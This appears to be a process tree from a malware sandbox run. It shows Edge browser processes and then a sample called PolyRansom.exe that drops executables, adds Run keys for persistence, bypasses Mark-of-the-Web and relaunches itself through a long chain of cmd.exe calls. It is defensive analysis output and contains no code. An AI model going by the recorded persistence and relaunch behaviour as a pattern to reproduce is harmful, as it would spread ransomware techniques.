  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=216 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8260 /prefetch:1
  2⤵
  PID:908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8772 /prefetch:1
  2⤵
  PID:656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8972 /prefetch:1
  2⤵
  PID:5004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9080 /prefetch:1
  2⤵
  PID:5864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=9264 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1
  2⤵
  PID:5376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9616 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9276 /prefetch:1
  2⤵
  PID:6040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9836 /prefetch:1
  2⤵
  PID:4520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10044 /prefetch:1
  2⤵
  PID:4152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9796 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10356 /prefetch:1
  2⤵
  PID:4084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10456 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10656 /prefetch:1
  2⤵
  PID:1136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10892 /prefetch:1
  2⤵
  PID:5252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10600 /prefetch:1
  2⤵
  PID:5436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10576 /prefetch:1
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9644 /prefetch:1
  2⤵
  PID:5200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9424 /prefetch:1
  2⤵
  PID:1996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9200 /prefetch:1
  2⤵
  PID:2192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9540 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11140 /prefetch:1
  2⤵
  PID:792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11224 /prefetch:1
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11368 /prefetch:1
  2⤵
  PID:5556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11644 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
  2⤵
  PID:6584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6572 /prefetch:8
  2⤵
  PID:4496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11420 /prefetch:8
  2⤵
  PID:6724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3204 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11364 /prefetch:1
  2⤵
  PID:7884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11804 /prefetch:8
  2⤵
  PID:7952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1920,5309491881108572108,1378251599337952858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11832 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:8124
- C:\Users\Admin\Downloads\PolyRansom.exe
  "C:\Users\Admin\Downloads\PolyRansom.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  PID:8068
- - C:\Users\Admin\DSgIcIgE\bcAYYIgE.exe
    "C:\Users\Admin\DSgIcIgE\bcAYYIgE.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2368
  - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank
      4⤵
      PID:7412
    - - C:\Program Files\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" about:blank
        5⤵
        
        PID:7376
- - C:\ProgramData\yGIYoQMg\zCEMUIgE.exe
    "C:\ProgramData\yGIYoQMg\zCEMUIgE.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:6716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6836
  - - C:\Users\Admin\Downloads\PolyRansom.exe
      C:\Users\Admin\Downloads\PolyRansom
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:7500
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2476
      - C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        7⤵
        
        PID:7188
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:7408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        9⤵
        
        PID:2128
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        10⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:7568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        11⤵
        
        PID:3164
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        12⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:7892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        13⤵
        
        PID:8104
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        14⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        15⤵
        System Location Discovery: System Language Discovery
        
        PID:4268
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        16⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:6328
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        17⤵
        
        PID:7268
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        18⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:6768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        19⤵
        
        PID:6500
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        20⤵
        Executes dropped EXE
        
        PID:7596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        21⤵
        
        PID:5872
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        22⤵
        Executes dropped EXE
        
        PID:7272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        23⤵
        System Location Discovery: System Language Discovery
        
        PID:7868
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        24⤵
        Executes dropped EXE
        
        PID:3796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:5388
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        26⤵
        Executes dropped EXE
        
        PID:5752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:7000
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        28⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6348
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        29⤵
        
        PID:7096
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        30⤵
        Executes dropped EXE
        
        PID:1492
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        31⤵
        
        PID:3560
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        32⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        33⤵
        System Location Discovery: System Language Discovery
        
        PID:7728
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        34⤵
        Executes dropped EXE
        
        PID:6728
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        35⤵
        
        PID:5556
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        36⤵
        Executes dropped EXE
        
        PID:3472
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        37⤵
        
        PID:8168
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        38⤵
        Executes dropped EXE
        
        PID:5536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        39⤵
        
        PID:2476
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        40⤵
        Executes dropped EXE
        
        PID:6800
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        41⤵
        System Location Discovery: System Language Discovery
        
        PID:4944
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        42⤵
        Executes dropped EXE
        
        PID:8156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        43⤵
        System Location Discovery: System Language Discovery
        
        PID:7400
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        44⤵
        Executes dropped EXE
        
        PID:1880
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        45⤵
        
        PID:6840
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        46⤵
        Executes dropped EXE
        
        PID:396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        47⤵
        
        PID:5452
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        
        PID:8040
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        48⤵
        Executes dropped EXE
        
        PID:6688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        49⤵
        
        PID:3068
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        50⤵
        Executes dropped EXE
        
        PID:6768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        51⤵
        System Location Discovery: System Language Discovery
        
        PID:5320
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        52⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        53⤵
        
        PID:7464
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        54⤵
        Executes dropped EXE
        
        PID:6176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        55⤵
        
        PID:7568
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        56⤵
        Executes dropped EXE
        
        PID:6236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        57⤵
        
        PID:5516
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        58⤵
        Executes dropped EXE
        
        PID:7484
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        59⤵
        
        PID:6412
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        60⤵
        Executes dropped EXE
        
        PID:6688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        61⤵
        System Location Discovery: System Language Discovery
        
        PID:7576
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        62⤵
        Executes dropped EXE
        
        PID:6684
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        63⤵
        
        PID:5620
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        64⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        65⤵
        System Location Discovery: System Language Discovery
        
        PID:4496
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        66⤵
        Executes dropped EXE
        
        PID:7244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        67⤵
        
        PID:7788
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        68⤵
        Executes dropped EXE
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        69⤵
        
        PID:7524
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        70⤵
        
        PID:7964
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        70⤵
        Executes dropped EXE
        
        PID:8164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        71⤵
        
        PID:7076
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        72⤵
        Executes dropped EXE
        
        PID:7892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        73⤵
        
        PID:7576
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        74⤵
        Executes dropped EXE
        
        PID:7836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        75⤵
        
        PID:7448
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        76⤵
        Executes dropped EXE
        
        PID:7500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        77⤵
        System Location Discovery: System Language Discovery
        
        PID:8144
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        78⤵
        Executes dropped EXE
        
        PID:8020
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        79⤵
        
        PID:1880
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        80⤵
        
        PID:8168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\PolyRansom"
        81⤵
        
        PID:5232
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        82⤵
        
        PID:5440
        
        C:\Users\Admin\Downloads\PolyRansom.exe
        
        C:\Users\Admin\Downloads\PolyRansom
        82⤵
        
        PID:7236
        
